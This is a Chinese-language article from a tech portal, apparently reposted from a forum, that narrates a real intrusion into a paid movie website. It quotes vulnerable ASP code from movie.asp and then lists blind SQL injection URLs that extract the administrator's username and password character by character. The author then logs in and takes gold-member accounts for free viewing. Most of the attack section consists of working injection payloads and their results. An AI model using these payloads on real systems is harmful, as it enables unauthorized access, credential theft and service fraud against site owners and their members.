首页 | 新闻资讯 | 软件应用 | 图形图像 | 网络应用 | 硬件学堂 | 程序开发 | 安全中心 | 素材下载 | 作者专区 | 学院论坛
精选专题 | 精美壁纸 | 专家答疑 | Flash剧场 | Photoshop | 名词解释 | 梦幻桌面 | PS高手进阶 | QQ区 | 图书 | 黑客教材
Flash教程| 卡通制作 | AutoCAD | 3DMax实例 | PS视频教程| 网页制作 | CorelDRAW| Firework | 滤镜与实例 | 全部视频教程
当前位置:eNet硅谷动力 > 学院频道 > 网络安全

简单入侵收费电影网站
2004-06-09 08:23 来源:eNet论坛
【简 介】
下面的文章是关于SQL injection的实例应用,大家可以结合自身情况学习一下,但是不要破坏国内主机哟!
    
加入收藏  设为首页

  近日学习sql injection,下载金梅收费电影程序2003会员版看了一通, 发现movie.asp这个文件有问题:
   dim sql

   dim rs

   articleid=request("id")

   set rs=server.createobject("adodb.recordset")

   sql="update learning set hits=hits+1 where articleID="amp;articleid

   rs.open sql,conn,1,3

   sql="select * from learning where articleid="amp;articleid

   rs.open sql,conn,1,1

   title=rs("title")

   ittype=rs("typeid")

  没有对变量做任何检查,那就别怪我了,呵呵,找了个目标网站,

  我们开始测试管理员帐号的位数,因为保存管理员帐号的字段名为name,所以语句为:

  http://www.target.com/movie.asp?id=330 and 1=(select id from password where len(name)>4)

  正常返回页面,由此我们可以知道管理员的帐号是大于4位的!

  我们继续,

  http://www.target.com/movie.asp?id=330 and 1=(select id from password where len(name)>

  "无法显示网页",出错了,由此我们可以知道管理员的帐号是大于等于8位的

  我们再来,

  http://www.target.com/movie.asp?id=330 and 1=(select id from password where len(name)=8)

  正常返回页面,好极了,由此得出

  name为8位

  同样

  http://www.target.com/movie.asp?id=330 and 1=(select id from password where len(pwd)=21)

  正常返回页面

  pwd为21位,TNND的,这么长!

  不管了,我们接下来开始测试管理员的用户名

  http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(name,1,1))>50)

  正常返回页面,看来还不够大.

  注:mid函数可以把密码分成若干部分取出,使用方法 mid(字符串,起始位,取出的字符串的长度)

  http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(name,1,1))>100)

  "无法显示页面",看来比100还小.

  http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(name,1,1))=100)

  正常返回页面,于是我们可以得到管理员的用户名第一位的asc码为:100

  通过查询asc码表可以得到,

  name的第一位为:d

  接下来顺利的得到了name=darkeyes^

  然后我们开始测试pwd,呼,有21位啊,真是路漫漫其修远啊!:)

  http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(pwd,1,1))>100)

  正常显示页面,再来

  http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(pwd,1,1))>110)

  "无法显示页面",比110小哦,呵呵

  http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(pwd,1,1))=102)

  正常显示页面,对了,得到

  pwd的第一位为:f

  最后顺利的得到了

  pwd=xyfsdb7ew8y654231123d

  找到管理页面,登录进去,拿了几个黄金会员的帐号,就去慢慢欣赏movies了,呵呵

  



关键字: 电影网站  入侵 
您对这篇文章的看法是:    喜欢 反感 支持 反对 加油 鄙视 学习 打击 佩服 漂亮 路过 发表评论
视频教程】 【专题汇总】 【不懂就问我关闭窗口
Photoshop把夏季外景图转成秋季暖色
实用售后兼得 视频监控设备选购技巧
酷6“牵手”开心网 达成合作协议
win8新特性将减少重启数及启动时间
Win7给力 6大秘密打造完美IE9浏览器
相关文章
 本栏目最新文章
· 路由器与计算机网络相辅相成
· 无线路由器故障的自检方法
· 路由器能连却不能上无线网处理方法
· 网管:二层交换机的安全秘诀
· 故障:路由器应对要防患于未然
 精彩回放
· 用Ps打造文字木头材质特效
· 用Ps给小木偶增加伤感色彩
· 用ps制作漂亮的创意时钟
· 用Ps打造新锐美女梦幻海报
· Ps调出草地儿童照片梦幻色
· Ps制作一颗漂亮的红色樱桃
· Ps打造逸长发少女音乐主题
· 用Ps打造美女舞者炫丽插画
 今日软件下载
杀毒软件免费随便用
瑞星全功能安全软件2009 基于“云安全”策略和“智能主动防御”技术开发.
www.rising.com.cn
 往日推荐
·广州车展:人气车模排行榜
·青春洋溢:“海藻”私密写真
·Photoshop 最简易磨皮方法

论坛精华
·操盘手主力版免费 选股更精准
·酷6K歌 与美女一起在线视频K歌
·找寻同城有缘人 在线万人同K歌
·美图秀秀图像处理工具最新版
·瑞星全功能安全软件2011下载
·愤怒的小鸟 绿色中文版 下载
热点推荐
打造梦幻美女
鼠绘古装美女
调出美女色调
Photoshop教程
热点关注
·Firework CS5 视频教程
·一个月,成就电脑高手之路
·《从实例学VC》视频教程
·2D游戏原画设计视频教程
·ASP.NET编程技巧范例大全
·Java软件开发高级视频教程
·C++从新手到高手视频教程
·C#语言基础视频教程
·Vray高级实例应用视频教程
往日推荐
练成C++高手
获奖3D图赏
ASP项目实战
PS发黄老照片
焦点关注
风尚视觉